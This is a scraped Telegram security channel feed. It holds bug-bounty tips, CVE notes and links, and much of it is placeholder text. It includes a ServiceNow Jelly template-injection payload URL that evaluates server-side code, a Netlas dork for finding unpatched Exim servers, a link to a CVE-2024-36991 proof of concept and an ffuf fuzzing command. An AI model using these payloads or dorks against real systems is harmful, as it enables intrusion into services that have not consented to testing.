Please open Telegram to view this post
VIEW IN TELEGRAM
π3
Please open Telegram to view this post
VIEW IN TELEGRAM
π7
Please open Telegram to view this post
VIEW IN TELEGRAM
π6β€βπ₯1π₯1π1π1
This media is not supported in your browser
VIEW IN TELEGRAM
β PoC: https://github.com/bigb0x/CVE-2024-36991
Please open Telegram to view this post
VIEW IN TELEGRAM
β€2π1
Please open Telegram to view this post
VIEW IN TELEGRAM
π3
π οΈGuide to Active Directory Hacking
πActive Directory (AD) is a directory service developed by Microsoft to manage and store network information, offering a central location for access control and network security.
π° Read more: https://en.iguru.gr/odigos-gia-active-directory-hacking/
π#infosec #cybersecurity #hacking #pentesting #security
πActive Directory (AD) is a directory service developed by Microsoft to manage and store network information, offering a central location for access control and network security.
π° Read more: https://en.iguru.gr/odigos-gia-active-directory-hacking/
π#infosec #cybersecurity #hacking #pentesting #security
This media is not supported in your browser
VIEW IN TELEGRAM
π¨βπ»6π3π€‘2π―1
CVE-2024-39929: Bypass of attachment verification in Eximβ
Due to incorrect parsing of a multiline RFC 2231 header filename, an attacker can bypass attachment verification and send an executable payload to the victim.
Search at Netlas.io:
π Link: https://nt.ls/gRdtH
π Dork: smtp.banner:"Exim" NOT smtp.banner:"Exim 4.98"
Read more: https://bugs.exim.org/show_bug.cgi?id=3099#c4
Due to incorrect parsing of a multiline RFC 2231 header filename, an attacker can bypass attachment verification and send an executable payload to the victim.
Search at Netlas.io:
π Link: https://nt.ls/gRdtH
π Dork: smtp.banner:"Exim" NOT smtp.banner:"Exim 4.98"
Read more: https://bugs.exim.org/show_bug.cgi?id=3099#c4
Brut Security pinned Β«π£ Understanding Bug Bounty Hunting for Newcomersπ£ π Bug bounty hunting can seem appealing, but itβs important to know: π± High Skill Level Required: Success in bug bounty hunting demands a very high skill level. It's not just about using tools like Nuclei toβ¦Β»
http://1337/login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*7);</g:evaluate></j:jelly></style>
π#bugbounty #bugbountytips #infosec
Please open Telegram to view this post
VIEW IN TELEGRAM
www.assetnote.io
Chaining Three Bugs to Access All Your ServiceNow Data
Through the course of 3/4 weeks, we were able to find a chain of vulnerabilities that allows full database access and full access to any MID servers configured. This resulted in 3 separate CVE's.
β€1π1
Please open Telegram to view this post
VIEW IN TELEGRAM
shreyaschavhan on Notion
Year in Bug Bounties - from 0 to $25,700* in 12 months (Stats, Graphs, Learnings, Experiences & Plans!) | Notion
Table of Content:
π₯5π1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯2
ffuf -c -ac -r -u https://target[.]com/FUZZ -w wordlist.txt
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - six2dez/OneListForAll: Rockyou for web fuzzing
Rockyou for web fuzzing. Contribute to six2dez/OneListForAll development by creating an account on GitHub.
π₯5